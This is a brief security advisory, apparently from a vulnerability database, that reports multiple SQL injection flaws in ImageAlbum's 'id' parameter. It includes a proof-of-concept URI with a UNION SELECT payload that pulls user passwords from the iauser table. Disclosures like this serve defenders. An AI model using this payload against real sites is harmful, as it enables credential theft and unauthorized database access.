|
ImageAlbum 'id' Parameter Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues. The following proof-of-concept URI is available. http://www.example.com/index.php/[domain]/?action=collection.imageview&id=643635 union all select iaimage.id, iaimage.name, description, iaimage.collection_id, iaimage.domain_id, password As path, access, visits, checked FROM iaimage, iauser WHERE iaimage.id=411 /* |
|
|
Privacy Statement |